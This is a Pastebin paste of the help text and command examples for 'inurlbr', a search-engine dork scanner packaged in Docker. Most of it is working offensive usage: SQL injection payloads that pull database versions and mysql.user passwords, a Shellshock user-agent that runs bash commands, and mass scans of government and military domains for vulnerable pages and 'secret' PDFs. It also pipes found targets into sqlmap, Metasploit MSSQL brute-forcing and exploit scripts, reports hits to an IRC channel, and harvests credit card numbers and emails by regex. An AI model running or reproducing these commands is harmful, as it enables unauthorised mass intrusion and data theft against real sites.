API tools faq
paste
Advertisement
Guest User

Inurl

a guest
Dec 9th, 2018
717
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.51 KB | None | 0 0
raw download clone embed print report
  1. A pesquisa avançada nos mecanismos de pesquisa permite a análise fornecida para explorar e-mails e URLs de captura GET / POST, com uma junção de validação personalizada interna para cada destino / URL encontrado.
  2.  
  3. Como construir
  4. git clone https://github.com/gmdutra/docker-inurlbr.git
  5. cd docker-inurlbr
  6. docker build -t gmdutra/inurlbr .
  7.  
  8. Corre
  9. docker run --name inurlbr -it -d gmdutra/inurlbr
  10. -h
  11. --help Alternative long length help command.
  12. --ajuda Command to specify Help.
  13. --info Information script.
  14. --update Code update.
  15. -q Choose which search engine you want through [1...24] / [e1..6]]:
  16. [options]:
  17. 1 - GOOGLE / (CSE) GENERIC RANDOM / API
  18. 2 - BING
  19. 3 - YAHOO BR
  20. 4 - ASK
  21. 5 - HAO123 BR
  22. 6 - GOOGLE (API)
  23. 7 - LYCOS
  24. 8 - UOL BR
  25. 9 - YAHOO US
  26. 10 - SAPO
  27. 11 - DMOZ
  28. 12 - GIGABLAST
  29. 13 - NEVER
  30. 14 - BAIDU BR
  31. 15 - YANDEX
  32. 16 - ZOO
  33. 17 - HOTBOT
  34. 18 - ZHONGSOU
  35. 19 - HKSEARCH
  36. 20 - EZILION
  37. 21 - SOGOU
  38. 22 - DUCK DUCK GO
  39. 23 - BOOROW
  40. 24 - GOOGLE(CSE) GENERIC RANDOM
  41. ----------------------------------------
  42. SPECIAL MOTORS
  43. ----------------------------------------
  44. e1 - TOR FIND
  45. e2 - ELEPHANT
  46. e3 - TORSEARCH
  47. e4 - WIKILEAKS
  48. e5 - OTN
  49. e6 - EXPLOITS SHODAN
  50. ----------------------------------------
  51. all - All search engines / not special motors
  52. Default: 1
  53. Example: -q {op}
  54. Usage: -q 1
  55. -q 5
  56. Using more than one engine: -q 1,2,5,6,11,24
  57. Using all engines: -q all
  58.  
  59. --proxy Choose which proxy you want to use through the search engine:
  60. Example: --proxy {proxy:port}
  61. Usage: --proxy localhost:8118
  62. --proxy socks5://[email protected]:9050
  63. --proxy http://admin:[email protected]:8080
  64.  
  65. --proxy-file Set font file to randomize your proxy to each search engine.
  66. Example: --proxy-file {proxys}
  67. Usage: --proxy-file proxys_list.txt
  68.  
  69. --time-proxy Set the time how often the proxy will be exchanged.
  70. Example: --time-proxy {second}
  71. Usage: --time-proxy 10
  72.  
  73. --proxy-http-file Set file with urls http proxy,
  74. are used to bular capch search engines
  75. Example: --proxy-http-file {youfilehttp}
  76. Usage: --proxy-http-file http_proxys.txt
  77.  
  78.  
  79. --tor-random Enables the TOR function, each usage links an unique IP.
  80.  
  81. -t Choose the validation type: op 1, 2, 3, 4, 5
  82. [options]:
  83. 1 - The first type uses default errors considering the script:
  84. It establishes connection with the exploit through the get method.
  85. Demo: www.alvo.com.br/pasta/index.php?id={exploit}
  86.  
  87. 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
  88. It also establishes connection with the exploit through the get method
  89. Demo: www.alvo.com.br/pasta/index.php?id={exploit}
  90.  
  91. 3 - The third type combine both first and second types:
  92. Then, of course, it also establishes connection with the exploit through the get method
  93. Demo: www.target.com.br{exploit}
  94. Default: 1
  95. Example: -t {op}
  96. Usage: -t 1
  97.  
  98. 4 - The fourth type a validation based on source file and will be enabled scanner standard functions.
  99. The source file their values are concatenated with target url.
  100. - Set your target with command --target {http://target}
  101. - Set your file with command -o {file}
  102. Explicative:
  103. Source file values:
  104. /admin/index.php?id=
  105. /pag/index.php?id=
  106. /brazil.php?new=
  107. Demo:
  108. www.target.com.br/admin/index.php?id={exploit}
  109. www.target.com.br/pag/index.php?id={exploit}
  110. www.target.com.br/brazil.php?new={exploit}
  111.  
  112. 5 - (FIND PAGE) The fifth type of validation based on the source file,
  113. Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
  114. - Set your target with command --target {http://target}
  115. - Set your file with command -o {file}
  116. Explicative:
  117. Source file values:
  118. /admin/admin.php
  119. /admin.asp
  120. /admin.aspx
  121. Demo:
  122. www.target.com.br/admin/admin.php
  123. www.target.com.br/admin.asp
  124. www.target.com.br/admin.aspx
  125. Observation: If it shows the code 200 will be separated in the output file
  126.  
  127. DEFAULT ERRORS:
  128.  
  129. [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
  130. [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
  131. [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  132. [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
  133. [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
  134. [*]ERROR INDEFINITE
  135.  
  136.  
  137. --dork Defines which dork the search engine will use.
  138. Example: --dork {dork}
  139. Usage: --dork 'site:.gov.br inurl:php? id'
  140. - Using multiples dorks:
  141. Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
  142. Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
  143.  
  144. --dork-file Set font file with your search dorks.
  145. Example: --dork-file {dork_file}
  146. Usage: --dork-file 'dorks.txt'
  147.  
  148. --exploit-get Defines which exploit will be injected through the GET method to each URL found.
  149. Example: --exploit-get {exploit_get}
  150. Usage: --exploit-get "?'´%270x27;"
  151.  
  152. --exploit-post Defines which exploit will be injected through the POST method to each URL found.
  153. Example: --exploit-post {exploit_post}
  154. Usage: --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'
  155.  
  156. --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.
  157. The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_
  158. Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
  159. _TARGET_ is the specified URL/TARGET obtained by the process
  160. _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
  161. Example: --exploit-command {exploit-command}
  162. Usage: --exploit-command '/admin/config.conf'
  163.  
  164. -a Specify the string that will be used on the search script:
  165. Example: -a {string}
  166. Usage: -a '<title>hello world</title>'
  167.  
  168. -d Specify the script usage op 1, 2, 3, 4, 5.
  169. Example: -d {op}
  170. Usage: -d 1 /URL of the search engine.
  171. -d 2 /Show all the url.
  172. -d 3 /Detailed request of every URL.
  173. -d 4 /Shows the HTML of every URL.
  174. -d 5 /Detailed request of all URLs.
  175. -d 6 /Detailed PING - PONG irc.
  176.  
  177. -s Specify the output file where it will be saved the vulnerable URLs.
  178.  
  179. Example: -s {file}
  180. Usage: -s your_file.txt
  181.  
  182. -o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
  183. Example: -o {file_where_my_urls_are}
  184. Usage: -o tests.txt
  185.  
  186. --persist Attempts when Google blocks your search.
  187. The script tries to another google host / default = 4
  188. Example: --persist {number_attempts}
  189. Usage: --persist 7
  190.  
  191. --ifredirect Return validation method post REDIRECT_URL
  192. Example: --ifredirect {string_validation}
  193. Usage: --ifredirect '/admin/painel.php'
  194.  
  195. -m Enable the search for emails on the urls specified.
  196.  
  197. -u Enables the search for URL lists on the url specified.
  198.  
  199. --gc Enable validation of values ​​with google webcache.
  200.  
  201. --pr Progressive scan, used to set operators (dorks),
  202. makes the search of a dork and valid results, then goes a dork at a time.
  203.  
  204. --file-cookie Open cookie file.
  205.  
  206. --save-as Save results in a certain place.
  207.  
  208. --shellshock Explore shellshock vulnerability by setting a malicious user-agent.
  209.  
  210. --popup Run --command all or vuln in a parallel terminal.
  211.  
  212. --cms-check Enable simple check if the url / target is using CMS.
  213.  
  214. --no-banner Remove the script presentation banner.
  215.  
  216. --unique Filter results in unique domains.
  217.  
  218. --beep Beep sound when a vulnerability is found.
  219.  
  220. --alexa-rank Show alexa positioning in the results.
  221.  
  222. --robots Show values file robots.
  223.  
  224. --range Set range IP.
  225. Example: --range {range_start,rage_end}
  226. Usage: --range '172.16.0.5#172.16.0.255'
  227.  
  228. --range-rand Set amount of random ips.
  229. Example: --range-rand {rand}
  230. Usage: --range-rand '50'
  231.  
  232. --irc Sending vulnerable to IRC / server channel.
  233. Example: --irc {server#channel}
  234. Usage: --irc 'irc.rizon.net#inurlbrasil'
  235.  
  236. --http-header Set HTTP header.
  237. Example: --http-header {youemail}
  238. Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'
  239.  
  240. --sedmail Sending vulnerable to email.
  241. Example: --sedmail {youemail}
  242. Usage: --sedmail [email protected]
  243.  
  244. --delay Delay between research processes.
  245. Example: --delay {second}
  246. Usage: --delay 10
  247.  
  248. --time-out Timeout to exit the process.
  249. Example: --time-out {second}
  250. Usage: --time-out 10
  251.  
  252. --ifurl Filter URLs based on their argument.
  253. Example: --ifurl {ifurl}
  254. Usage: --ifurl index.php?id=
  255.  
  256. --ifcode Valid results based on your return http code.
  257. Example: --ifcode {ifcode}
  258. Usage: --ifcode 200
  259.  
  260. --ifemail Filter E-mails based on their argument.
  261. Example: --ifemail {file_where_my_emails_are}
  262. Usage: --ifemail sp.gov.br
  263.  
  264. --url-reference Define referring URL in the request to send him against the target.
  265. Example: --url-reference {url}
  266. Usage: --url-reference http://target.com/admin/user/valid.php
  267.  
  268. --mp Limits the number of pages in the search engines.
  269. Example: --mp {limit}
  270. Usage: --mp 50
  271.  
  272. --user-agent Define the user agent used in its request against the target.
  273. Example: --user-agent {agent}
  274. Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
  275. Usage-exploit / SHELLSHOCK:
  276. --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
  277. Complete command:
  278. php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
  279.  
  280. --sall Saves all urls found by the scanner.
  281. Example: --sall {file}
  282. Usage: --sall your_file.txt
  283.  
  284. --command-vul Every vulnerable URL found will execute this command parameters.
  285. Example: --command-vul {command}
  286. Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'
  287. --command-vul './exploit.sh _TARGET_ output.txt'
  288. --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
  289.  
  290. --command-all Use this commmand to specify a single command to EVERY URL found.
  291. Example: --command-all {command}
  292. Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'
  293. --command-all './exploit.sh _TARGET_ output.txt'
  294. --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
  295. [!] Observation:
  296.  
  297. _TARGET_ will be replaced by the URL/target found, although if the user
  298. doesn't input the get, only the domain will be executed.
  299.  
  300. _TARGETFULL_ will be replaced by the original URL / target found.
  301.  
  302. _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.
  303.  
  304. _TARGETIP_ return of ip URL / target found.
  305.  
  306. _URI_ Back URL set of folders / target found.
  307.  
  308. _RANDOM_ Random strings.
  309.  
  310. _PORT_ Capture port of the current test, within the --port-scan process.
  311.  
  312. _EXPLOIT_ will be replaced by the specified command argument --exploit-command.
  313. The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_
  314.  
  315. --replace Replace values ​​in the target URL.
  316. Example: --replace {value_old[INURL]value_new}
  317. Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
  318. --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
  319. --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'
  320.  
  321. --remove Remove values ​​in the target URL.
  322. Example: --remove {string}
  323. Usage: --remove '/admin.php?id=0'
  324.  
  325. --regexp Using regular expression to validate his research, the value of the
  326. Expression will be sought within the target/URL.
  327. Example: --regexp {regular_expression}
  328. All Major Credit Cards:
  329. Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'
  330.  
  331. IP Addresses:
  332. Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
  333.  
  334. EMAIL:
  335. Usage: --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
  336.  
  337.  
  338. ---regexp-filter Using regular expression to filter his research, the value of the
  339. Expression will be sought within the target/URL.
  340. Example: ---regexp-filter {regular_expression}
  341. EMAIL:
  342. Usage: ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
  343.  
  344.  
  345. [!] Small commands manager:
  346.  
  347. --exploit-cad Command register for use within the scanner.
  348. Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
  349. Example Format: NMAP::nmap -sV _TARGET_
  350. Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
  351. Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_'
  352. Observation: Each registered command is identified by an id of your array.
  353. Commands are logged in exploits.conf file.
  354.  
  355. --exploit-all-id Execute commands, exploits based on id of use,
  356. (all) is run for each target found by the engine.
  357. Example: --exploit-all-id {id,id}
  358. Usage: --exploit-all-id 1,2,8,22
  359.  
  360. --exploit-vul-id Execute commands, exploits based on id of use,
  361. (vull) run command only if the target was considered vulnerable.
  362. Example: --exploit-vul-id {id,id}
  363. Usage: --exploit-vul-id 1,2,8,22
  364.  
  365. --exploit-list List all entries command in exploits.conf file.
  366.  
  367.  
  368. [!] Running subprocesses:
  369.  
  370. --sub-file Subprocess performs an injection
  371. strings in URLs found by the engine, via GET or POST.
  372. Example: --sub-file {youfile}
  373. Usage: --sub-file exploits_get.txt
  374.  
  375. --sub-get defines whether the strings coming from
  376. --sub-file will be injected via GET.
  377. Usage: --sub-get
  378.  
  379. --sub-post defines whether the strings coming from
  380. --sub-file will be injected via POST.
  381. Usage: --sub-get
  382.  
  383.  
  384. --sub-cmd-vul Each vulnerable URL found within the sub-process
  385. will execute the parameters of this command.
  386. Example: --sub-cmd-vul {command}
  387. Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
  388. --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
  389. --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
  390.  
  391. --sub-cmd-all Run command to each target found within the sub-process scope.
  392. Example: --sub-cmd-all {command}
  393. Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
  394. --sub-cmd-all './exploit.sh _TARGET_ output.txt'
  395. --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'
  396.  
  397.  
  398. --port-scan Defines ports that will be validated as open.
  399. Example: --port-scan {ports}
  400. Usage: --port-scan '22,21,23,3306'
  401.  
  402. --port-cmd Define command that runs when finding an open door.
  403. Example: --port-cmd {command}
  404. Usage: --port-cmd './xpl _TARGETIP_:_PORT_'
  405. --port-cmd './xpl _TARGETIP_/file.php?sqli=1'
  406.  
  407. --port-write Send values for door.
  408. Example: --port-write {'value0','value1','value3'}
  409. Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"
  410.  
  411.  
  412.  
  413. [!] Modifying values used within script parameters:
  414.  
  415. md5 Encrypt values in md5.
  416. Example: md5({value})
  417. Usage: md5(102030)
  418. Usage: --exploit-get 'user?id=md5(102030)'
  419.  
  420. base64 Encrypt values in base64.
  421. Example: base64({value})
  422. Usage: base64(102030)
  423. Usage: --exploit-get 'user?id=base64(102030)'
  424.  
  425. hex Encrypt values in hex.
  426. Example: hex({value})
  427. Usage: hex(102030)
  428. Usage: --exploit-get 'user?id=hex(102030)'
  429.  
  430. Generate random values.
  431. Example: random({character_counter})
  432. Usage: random(8)
  433. Usage: --exploit-get 'user?id=random(8)'
  434.  
  435. Comandos Simples
  436. docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
  437.  
  438. docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
  439.  
  440. docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
  441.  
  442. docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
  443.  
  444. docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
  445.  
  446. docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
  447.  
  448. docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
  449.  
  450. docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
  451.  
  452. docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'
  453.  
  454. docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'
  455.  
  456. docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'
  457.  
  458. docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
  459.  
  460. docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
  461.  
  462. docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
  463.  
  464. docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
  465.  
  466. docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
  467.  
  468. docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
  469.  
  470. docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
  471.  
  472. docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
  473.  
  474. docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'
  475.  
  476. docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4
  477.  
  478. docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"
  479.  
  480. docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'
  481.  
  482. docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5
  483.  
  484. docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'
  485.  
  486. docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'
  487.  
  488. docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8
  489.  
  490. docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr
  491.  
  492. docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock
  493.  
  494. docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'
  495.  
  496. Desenvolvedores
  497. ----------------------------------------------
  498. Original Version
  499. ----------------------------------------------
  500. [+] AUTOR: googleINURL
  501. [+] EMAIL: [email protected]
  502. [+] Blog: http://blog.inurl.com.br
  503. ----------------------------------------------
  504. Docker Version
  505. ----------------------------------------------
  506. [+] AUTOR: Gabriel Dutra (c0olr00t)
  507. [+] EMAIL: [email protected]
  508. [+] LINKEDIN: linkedin.com/in/gmdutra/
  509. ----------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!